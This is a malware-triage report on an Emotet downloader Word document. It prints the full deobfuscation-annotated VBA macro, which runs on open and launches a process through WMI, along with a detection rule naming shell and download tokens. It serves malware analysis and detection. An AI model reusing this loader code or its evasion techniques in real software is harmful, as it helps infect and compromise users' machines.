Verdict: MALICIOUS
Risk Score: 172
Heuristics: 7
-
ClamAV: Doc.Downloader.EmotetRed02224-9938637-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.EmotetRed02224-9938637-0
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script: `Set Trtf5nb4xxpitfu9sg = CreateObject(Nzb4r_zeqj9q1i)`
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script: `Private Sub Document_open()`
-
Suspicious extracted artifact — info — EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (a standard OOXML schema namespace URI) — in document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7512 bytes |

SHA-256: f080f423f3af32bf8c04d24f919af2345f2f15905193e2101e5f7b51599e8466

Detection
ClamAV: No threats found (the Doc.Downloader.EmotetRed02224-9938637-0 match above is on the parent document, not on this extracted file)
Obfuscation or payload: likely — 77 of 134 identifiers look randomly generated (e.g. 'Trtf5nb4xxpitfu9sg'), consistent with name-mangling obfuscation.
Preview script — first 1,000 lines of the extracted script
' Module header emitted by olevba for the document class module: VB_Base
' "1Normal.ThisDocument" with VB_PredeclaredId = True means the module name
' "Rw_gu6fr25wcs" is the document object itself; S592_m87mbgfjud7 below reads
' its StoryRanges to fetch the document body text.
Attribute VB_Name = "Rw_gu6fr25wcs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-execution entry point (reported as OLE_VBA_DOCOPEN): runs when the
' document is opened and does nothing but hand off to S592_m87mbgfjud7.
Private Sub Document_open()
S592_m87mbgfjud7
End Sub
' olevba concatenates every VBA module into one stream; these two VB_Name
' attributes are the headers of the following modules, which hold the three
' functions below.
Attribute VB_Name = "Rkhqpdwb_l8se"
Attribute VB_Name = "Qsfjcxgtaymuqu25a"
' Main routine of the macro (called from Document_open). How to read it: every
' `GoTo <label>` jumps straight to the matching `<label>:` a few lines further
' down, so the cube-root arithmetic in between is unreachable padding and the
' only live statements are the ones directly after each label. Those live
' statements assemble a string from fragments that all carry the filler token
' "w]xm[v", strip the filler with X0t5ado8nk6ef4rpj -> Z2il953431_z, and hand
' the result to CreateObject. On Error Resume Next masks every error from the
' undeclared names (Pbhz_o5fkfkt, Fm5nbzei0o9farh, ...), which evaluate to
' Empty because nothing in the visible source ever assigns them.
Function S592_m87mbgfjud7()
On Error Resume Next
' Assigns Empty (R3e1bbjchnw0f is never set) and is never read again.
Pbhz_o5fkfkt = R3e1bbjchnw0f
' dsfe = the document's main body text: the two undeclared names on either
' side contribute Empty, and the Range presumably coerces to its Text. The
' command line executed at the end of this routine comes from here, i.e. from
' the document body, not from the macro source itself.
dsfe = Fm5nbzei0o9farh + Rw_gu6fr25wcs.StoryRanges(wdMainTextStory) + O5197gw93dzfn
' Unreachable padding block (skipped by the GoTo); the same pattern repeats
' after every live statement below.
GoTo PvkOCY
Set MyBOZB = OFJpWCLE
Dim uyvFIBG As Double
uyvFIBG = Fix(PvkOCY)
If uyvFIBG <> PvkOCY Then Exit Function
Dim bzPNAC As Double
bzPNAC = uyvFIBG ^ (1 / 3)
If Fix(bzPNAC) ^ 3 = uyvFIBG Then
jmnlSF = True
ElseIf (Fix(bzPNAC) + 1) ^ 3 = uyvFIBG Then
jmnlSF = True
End If
PvkOCY:
' Moniker fragments: with the filler "w]xm[v" removed these read "p" and
' "rocess".
g42 = "w]xm[vpw]xm[v"
Ncrmfnnaavobw5uq = "w]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v"
' unreachable padding
GoTo aCfyHqBJU
Set esyZCOZCE = GsAAHCUR
Dim EBCVDHtDE As Double
EBCVDHtDE = Fix(aCfyHqBJU)
If EBCVDHtDE <> aCfyHqBJU Then Exit Function
Dim PpZkBECGq As Double
PpZkBECGq = EBCVDHtDE ^ (1 / 3)
If Fix(PpZkBECGq) ^ 3 = EBCVDHtDE Then
DFtrV = True
ElseIf (Fix(PpZkBECGq) + 1) ^ 3 = EBCVDHtDE Then
DFtrV = True
End If
aCfyHqBJU:
' Reads ":win32_" once the filler is removed.
Lngd_p0zc8fkccwqsn = "w]xm[v:ww]xm[vw]xm[vinw]xm[v3w]xm[v2w]xm[v_w]xm[v"
' unreachable padding
GoTo gPnGIBLJF
Set zjpmoDH = amqiA
Dim NmquxG As Double
NmquxG = Fix(gPnGIBLJF)
If NmquxG <> gPnGIBLJF Then Exit Function
Dim trdCBeG As Double
trdCBeG = NmquxG ^ (1 / 3)
If Fix(trdCBeG) ^ 3 = NmquxG Then
IFqfJBoIs = True
ElseIf (Fix(trdCBeG) + 1) ^ 3 = NmquxG Then
IFqfJBoIs = True
End If
gPnGIBLJF:
' Reads "winmgmt" once the filler is removed.
Srnoiqwpt7ynyn0k4a = "ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[v"
' unreachable padding
GoTo raRrIaIIC
Set TIsEDDJr = yqjoECAzA
Dim ktiDB As Double
ktiDB = Fix(raRrIaIIC)
If ktiDB <> raRrIaIIC Then Exit Function
Dim pOxLF As Double
pOxLF = ktiDB ^ (1 / 3)
If Fix(pOxLF) ^ 3 = ktiDB Then
BAvxGHFhl = True
ElseIf (Fix(pOxLF) + 1) ^ 3 = ktiDB Then
BAvxGHFhl = True
End If
raRrIaIIC:
' One character of the host application's name (start 6, length 1), wrapped in
' filler-only fragments. The host is Word (VB_Base above); Word reports
' Application.Name as "Microsoft Word", whose sixth character is "s". Taking
' the letter from the environment instead of a literal also makes the decoded
' moniker never appear whole in the macro text.
V2ult24fkwwep1k = "w]xm[vw]xm[v" + Mid(Application.Name, 4 + 2, 2 - 1) + "w]xm[vw]xm[v"
' unreachable padding
GoTo ncxWEs
Set WcKzVnHB = uZbUBJsJ
Dim WUEiDGCz As Double
WUEiDGCz = Fix(ncxWEs)
If WUEiDGCz <> ncxWEs Then Exit Function
Dim ELmIwJFCH As Double
ELmIwJFCH = WUEiDGCz ^ (1 / 3)
If Fix(ELmIwJFCH) ^ 3 = WUEiDGCz Then
BglyrFm = True
ElseIf (Fix(ELmIwJFCH) + 1) ^ 3 = WUEiDGCz Then
BglyrFm = True
End If
ncxWEs:
' Concatenation order: "winmgmt" + "s" + ":win32_" + "p" + "rocess" — once
' the filler is stripped this is the WMI moniker "winmgmts:win32_process".
Qiu2fizkf7p = Srnoiqwpt7ynyn0k4a + V2ult24fkwwep1k + Lngd_p0zc8fkccwqsn + g42 + Ncrmfnnaavobw5uq
' unreachable padding
GoTo xNgLBVADL
Set vUMRG = cQvdhIGDJ
Dim FDYIADJ As Double
FDYIADJ = Fix(xNgLBVADL)
If FDYIADJ <> xNgLBVADL Then Exit Function
Dim omDVzktg As Double
omDVzktg = FDYIADJ ^ (1 / 3)
If Fix(omDVzktg) ^ 3 = FDYIADJ Then
GCxeCFDEN = True
ElseIf (Fix(omDVzktg) + 1) ^ 3 = FDYIADJ Then
GCxeCFDEN = True
End If
xNgLBVADL:
' Strip the filler token (X0t5ado8nk6ef4rpj is a wrapper around Z2il953431_z).
Nzb4r_zeqj9q1i = X0t5ado8nk6ef4rpj(Qiu2fizkf7p)
' unreachable padding
GoTo CNgSGHHJ
Set bESDIV = XJRoA
Dim VkPjEos As Double
VkPjEos = Fix(CNgSGHHJ)
If VkPjEos <> CNgSGHHJ Then Exit Function
Dim lsNlHnLW As Double
lsNlHnLW = VkPjEos ^ (1 / 3)
If Fix(lsNlHnLW) ^ 3 = VkPjEos Then
sZSixHX = True
ElseIf (Fix(lsNlHnLW) + 1) ^ 3 = VkPjEos Then
sZSixHX = True
End If
CNgSGHHJ:
' Reported as OLE_VBA_CREATEOBJ: binds to the decoded WMI moniker. Static
' CreateObject("...") string rules miss this because the argument is a
' variable built at run time.
Set Trtf5nb4xxpitfu9sg = CreateObject(Nzb4r_zeqj9q1i)
' unreachable padding
GoTo ucgNHFCDT
Set DjeFGgFHF = jiTpFB
Dim yzrRYACG As Double
yzrRYACG = Fix(ucgNHFCDT)
If yzrRYACG <> ucgNHFCDT Then Exit Function
Dim KBSNEEWB As Double
KBSNEEWB = yzrRYACG ^ (1 / 3)
If Fix(KBSNEEWB) ^ 3 = yzrRYACG Then
RvbuZbA = True
ElseIf (Fix(KBSNEEWB) + 1) ^ 3 = yzrRYACG Then
RvbuZbA = True
End If
ucgNHFCDT:
' Two consecutive padding blocks with no live statement between them.
GoTo BidaeP
Set FhUxz = DaugHW
Dim jeLiOuI As Double
jeLiOuI = Fix(BidaeP)
If jeLiOuI <> BidaeP Then Exit Function
Dim hdlPOQo As Double
hdlPOQo = jeLiOuI ^ (1 / 3)
If Fix(hdlPOQo) ^ 3 = jeLiOuI Then
GkAdBBs = True
ElseIf (Fix(hdlPOQo) + 1) ^ 3 = jeLiOuI Then
GkAdBBs = True
End If
BidaeP:
GoTo kqmdaEFJA
Set qbuhElFE = LSQPB
Dim JUYFDGIC As Double
JUYFDGIC = Fix(kqmdaEFJA)
If JUYFDGIC <> kqmdaEFJA Then Exit Function
Dim WzqUbBK As Double
WzqUbBK = JUYFDGIC ^ (1 / 3)
If Fix(WzqUbBK) ^ 3 = JUYFDGIC Then
BsSGTDT = True
ElseIf (Fix(WzqUbBK) + 1) ^ 3 = JUYFDGIC Then
BsSGTDT = True
End If
kqmdaEFJA:
' Process creation via the WMI object. The command line is the document body
' (dsfe) with its first 4 characters dropped, run through the same
' filler-stripping decoder; P166w5r3i5jp4238 and If6j690451vbbks are never
' assigned (Empty), presumably standing in for the optional trailing
' Win32_Process.Create arguments. Detection note: a process started through
' WMI is typically parented by the WMI provider host rather than by the Office
' process, so parent/child rules keyed on WINWORD.EXE alone will not see it;
' the encoded command in the document body is the artifact to recover.
Trtf5nb4xxpitfu9sg.Create X0t5ado8nk6ef4rpj(Mid(dsfe, (1 + 4), Len(dsfe))), P166w5r3i5jp4238, If6j690451vbbks
' Two trailing padding blocks; nothing live follows.
GoTo IignOANIj
Set HwbMfICB = PWARIFZ
Dim ABxuBHE As Double
ABxuBHE = Fix(IignOANIj)
If ABxuBHE <> IignOANIj Then Exit Function
Dim eKUCGZBg As Double
eKUCGZBg = ABxuBHE ^ (1 / 3)
If Fix(eKUCGZBg) ^ 3 = ABxuBHE Then
VgsXETK = True
ElseIf (Fix(eKUCGZBg) + 1) ^ 3 = ABxuBHE Then
VgsXETK = True
End If
IignOANIj:
GoTo XVDamX
Set GnYebI = ZgCQIBIFC
Dim VvEuYFHh As Double
VvEuYFHh = Fix(XVDamX)
If VvEuYFHh <> XVDamX Then Exit Function
Dim EJRjID As Double
EJRjID = VvEuYFHh ^ (1 / 3)
If Fix(EJRjID) ^ 3 = VvEuYFHh Then
arMEDBF = True
ElseIf (Fix(EJRjID) + 1) ^ 3 = VvEuYFHh Then
arMEDBF = True
End If
XVDamX:
End Function
' Decoder wrapper: returns Z2il953431_z(X8wwk8r7jfbpm), i.e. the input with
' the filler token removed. As in S592_m87mbgfjud7, each `GoTo` skips the
' cube-root block that follows it, so the only live statements are the three
' assignments directly after the labels (copy the argument, decode it, set the
' return value). The indirection exists only to separate the Replace call from
' the CreateObject/.Create sites.
Function X0t5ado8nk6ef4rpj(X8wwk8r7jfbpm)
On Error Resume Next
' unreachable padding
GoTo WZUdHBZaH
Set jHRcHAFB = TABDzCADB
Dim QBOZDbEJ As Double
QBOZDbEJ = Fix(WZUdHBZaH)
If QBOZDbEJ <> WZUdHBZaH Then Exit Function
Dim boFfGxGS As Double
boFfGxGS = QBOZDbEJ ^ (1 / 3)
If Fix(boFfGxGS) ^ 3 = QBOZDbEJ Then
WZWqJADCg = True
ElseIf (Fix(boFfGxGS) + 1) ^ 3 = QBOZDbEJ Then
WZWqJADCg = True
End If
WZUdHBZaH:
' Live: copy the argument.
Blgk4qx76heo836i = X8wwk8r7jfbpm
' unreachable padding
GoTo dudVBay
Set wsDmDIMZ = uCYttI
Dim ZlXYCaCe As Double
ZlXYCaCe = Fix(dudVBay)
If ZlXYCaCe <> dudVBay Then Exit Function
Dim dwpXOCmJA As Double
dwpXOCmJA = ZlXYCaCe ^ (1 / 3)
If Fix(dwpXOCmJA) ^ 3 = ZlXYCaCe Then
IcWfHD = True
ElseIf (Fix(dwpXOCmJA) + 1) ^ 3 = ZlXYCaCe Then
IcWfHD = True
End If
dudVBay:
' Live: strip the filler token.
Qzkzhgncxvuxkrrey = Z2il953431_z(Blgk4qx76heo836i)
' unreachable padding
GoTo HBJsCEQtW
Set NGgXFBSG = mLinF
Dim ezvjBtD As Double
ezvjBtD = Fix(HBJsCEQtW)
If ezvjBtD <> HBJsCEQtW Then Exit Function
Dim fflFJHn As Double
fflFJHn = ezvjBtD ^ (1 / 3)
If Fix(fflFJHn) ^ 3 = ezvjBtD Then
VjLOAB = True
ElseIf (Fix(fflFJHn) + 1) ^ 3 = ezvjBtD Then
VjLOAB = True
End If
HBJsCEQtW:
' Live: set the return value.
X0t5ado8nk6ef4rpj = Qzkzhgncxvuxkrrey
' unreachable padding
GoTo rVQcIIGFQ
Set KxZkUACAE = AXSdBFkCd
Dim NzXjJDCMB As Double
NzXjJDCMB = Fix(rVQcIIGFQ)
If NzXjJDCMB <> rVQcIIGFQ Then Exit Function
Dim NjaBJBCD As Double
NjaBJBCD = NzXjJDCMB ^ (1 / 3)
If Fix(NjaBJBCD) ^ 3 = NzXjJDCMB Then
nbMPli = True
ElseIf (Fix(NjaBJBCD) + 1) ^ 3 = NzXjJDCMB Then
nbMPli = True
End If
rVQcIIGFQ:
End Function
' The actual decoder: replaces every occurrence of the filler token "w]xm[v"
' with Al9mjvbhj96z0o13bf, a name that is never assigned anywhere in the
' visible source. As an uninitialised Variant it is Empty, which Replace
' treats as "", so the call simply deletes the filler. The literal "w]xm[v"
' is the one constant that every encoded fragment in this sample shares and
' is therefore the most stable string to key a rule on.
Function Z2il953431_z(Cslyrrtx2vmz7w6edz)
Z2il953431_z = Replace(Cslyrrtx2vmz7w6edz, "w]xm[v", Al9mjvbhj96z0o13bf)
End Function